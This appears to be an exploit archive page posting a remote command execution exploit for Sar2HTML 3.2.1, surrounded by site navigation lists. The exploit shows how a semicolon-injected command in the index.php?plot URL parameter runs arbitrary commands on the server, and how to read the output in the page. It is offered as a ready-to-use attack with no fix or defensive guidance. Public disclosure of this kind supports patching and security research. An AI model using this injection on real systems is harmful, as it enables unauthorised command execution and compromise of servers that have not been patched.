Sar2HTML 3.2.1 Remote Command Execution

Sar2HTML 3.2.1 Remote Command Execution: Posted Aug 2, 2019; Authored by Furkan Kayapinar; Sar2HTML version 3.2.1 suffers from a remote code execution vulnerability.; tags | exploit, remote, code execution; SHA-256 | 5fa15a6b77d4962ba78da4a2e5ccc45e9c58643332ff42a8a24f459ad157b766; Download | Favorite | View

Sar2HTML 3.2.1 Remote Command Execution

# Exploit Title: sar2html Remote Code Execution
# Date: 01/08/2019
# Exploit Author: Furkan KAYAPINAR
# Vendor Homepage:https://github.com/cemtan/sar2html 
# Software Link: https://sourceforge.net/projects/sar2html/
# Version: 3.2.1
# Tested on: Centos 7

In web application you will see index.php?plot url extension.

http://<ipaddr>/index.php?plot=;<command-here> will execute 
the command you entered. After command injection press "select # host" then your command's 
output will appear bottom side of the scroll screen.

Top Authors In Last 30 Days

Red Hat 210 files
indoushka 182 files
Ubuntu 93 files
Gentoo 32 files
Debian 18 files
Matthias Deeg 11 files
Chris Beiter 11 files
Frederik Beimgraben 11 files
Apple 10 files
malvuln 8 files

File Archives

Systems

AIX (430)
Apple (2,115)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,135)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,599)
HPUX (881)
iOS (390)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,421)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,936)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,899)
UNIX (9,465)
UnixWare (188)
Windows (6,782)
Other

Sar2HTML 3.2.1 Remote Command Execution

Sar2HTML 3.2.1 Remote Command Execution

File Archive:

October 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Sar2HTML 3.2.1 Remote Command Execution

Share This

Sar2HTML 3.2.1 Remote Command Execution

File Archive:

October 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems